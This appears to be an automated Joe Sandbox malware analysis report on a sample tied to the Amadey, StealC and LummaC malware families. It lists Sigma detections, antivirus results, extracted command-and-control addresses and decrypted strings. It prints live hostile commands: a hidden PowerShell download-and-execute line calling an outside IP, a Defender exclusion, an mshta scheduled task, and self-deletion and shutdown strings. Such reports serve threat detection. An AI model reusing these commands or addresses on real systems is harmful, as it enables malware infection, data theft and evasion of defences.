                                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, ParentProcessId: 7812, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', ProcessId: 1888, ProcessName: powershell.exe
                                      Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4476, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f, ProcessId: 3272, ProcessName: schtasks.exe
                                      Sigma detected: Suspicious MSHTA Child Process
                                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
                                      Sigma detected: Browser Started with Remote Debugging
                                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe", ParentImage: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe, ParentProcessId: 7656, ParentProcessName: DLTDCR8UJINP8YM8Y.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 2496, ProcessName: chrome.exe
                                      Sigma detected: CurrentVersion Autorun Keys Modification
                                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am.cmd
                                      Sigma detected: PowerShell Download Pattern
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
                                      Sigma detected: PowerShell Web Download
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
                                      Sigma detected: Powershell Defender Exclusion
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, ParentProcessId: 7812, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', ProcessId: 1888, ProcessName: powershell.exe
                                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe
                                      Sigma detected: Non Interactive PowerShell Process Spawned
                                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe, ParentProcessId: 7812, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp', ProcessId: 1888, ProcessName: powershell.exe
                                      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7500, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 420, ProcessName: powershell.exe

                                      Data Obfuscation

                                      barindex
                                      Sigma detected: Powershell download and execute file
                                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta "C:\Temp\.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4828, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 1228, ProcessName: powershell.exe

                                      Suricata Signatures

                                      No Suricata rule has matched

                                      Joe Sandbox Signatures

                                      Click to jump to signature section

                                      Show All Signature Results

                                      AV Detection

                                      barindex
                                      Antivirus / Scanner detection for submitted sample
                                      Source: 5EfYBe3nch.exeAvira: detected
                                      Antivirus detection for URL or domain
                                      Source: http://185.215.113.206/c4becf79229cb002.phpETAvira URL Cloud: Label: malware
                                      Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllNQMAvira URL Cloud: Label: malware
                                      Source: http://185.215.113.206/c4becf79229cb002.phpmTAvira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop/XAvira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop/5Avira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop/api92Avira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop/KAvira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop/eAvira URL Cloud: Label: malware
                                      Source: http://185.215.113.206/68b591d6548ec281/nss3.dllnPmAvira URL Cloud: Label: malware
                                      Source: http://185.215.113.206/c4becf79229cb002.phpiSAvira URL Cloud: Label: malware
                                      Source: http://185.215.113.206/c4becf79229cb002.php-S0Avira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop/apiMAvira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop:443/apiAvira URL Cloud: Label: malware
                                      Source: https://fancywaxxers.shop/api)Avira URL Cloud: Label: malware
                                      Source: http://185.215.113.206/c4becf79229cb002.phpyDAvira URL Cloud: Label: malware
                                      Antivirus detection for dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exeAvira: detection malicious, Label: TR/Spy.Gen8
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exeAvira: detection malicious, Label: TR/Spy.Gen8
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                      Found malware configuration
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
                                      Source: 5EfYBe3nch.exe.7268.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "framekgirus.shop", "abruptyopsn.shop", "noisycuttej.shop", "tirepublicerj.shop", "fancywaxxers.shop"], "Build id": "W0uk--"}
                                      Multi AV Scanner detection for dropped file
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exeReversingLabs: Detection: 26%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exeReversingLabs: Detection: 65%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exeReversingLabs: Detection: 44%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exeReversingLabs: Detection: 30%
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeReversingLabs: Detection: 65%
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeReversingLabs: Detection: 30%
                                      Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exeReversingLabs: Detection: 26%
                                      Source: C:\Users\user\AppData\Local\Temp\1027024001\am.exeReversingLabs: Detection: 44%
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeReversingLabs: Detection: 63%
                                      Multi AV Scanner detection for submitted file
                                      Source: 5EfYBe3nch.exeVirustotal: Detection: 57%Perma Link
                                      Source: 5EfYBe3nch.exeReversingLabs: Detection: 68%
                                      AI detected suspicious sample
                                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                      Machine Learning detection for dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Temp\1027024001\am.exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeJoe Sandbox ML: detected
                                      Machine Learning detection for sample
                                      Source: 5EfYBe3nch.exeJoe Sandbox ML: detected
                                      Sample uses string decryption to hide its real strings
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 185.215.113.43
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: /Zu7JuNko/index.php
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: S-%lu-
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: abc3bc1985
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: skotes.exe
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Startup
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: cmd /C RMDIR /s/q
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: rundll32
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Programs
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: %USERPROFILE%
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: cred.dll|clip.dll|
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: cred.dll
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: clip.dll
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: http://
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: https://
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: /quiet
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: /Plugins/
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: &unit=
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: shell32.dll
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: kernel32.dll
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: GetNativeSystemInfo
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ProgramData\
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: AVAST Software
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Kaspersky Lab
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Panda Security
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Doctor Web
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 360TotalSecurity
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Bitdefender
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Norton
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Sophos
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Comodo
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: WinDefender
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: 0123456789
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ------
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ?scr=1
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ComputerName
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: -unicode-
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: VideoID
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: DefaultSettings.XResolution
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: DefaultSettings.YResolution
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: ProductName
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: CurrentBuild
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: rundll32.exe
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: "taskkill /f /im "
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: " && timeout 1 && del
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: && Exit"
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: " && ren
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: Powershell.exe
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: -executionpolicy remotesigned -File "
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: shutdown -s -t 0
                                      Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmpString decryptor: random
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: INSERT_KEY_HERE
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 07
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 01
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 20
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: 25
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetProcAddress
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: LoadLibraryA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: lstrcatA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: OpenEventA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateEventA
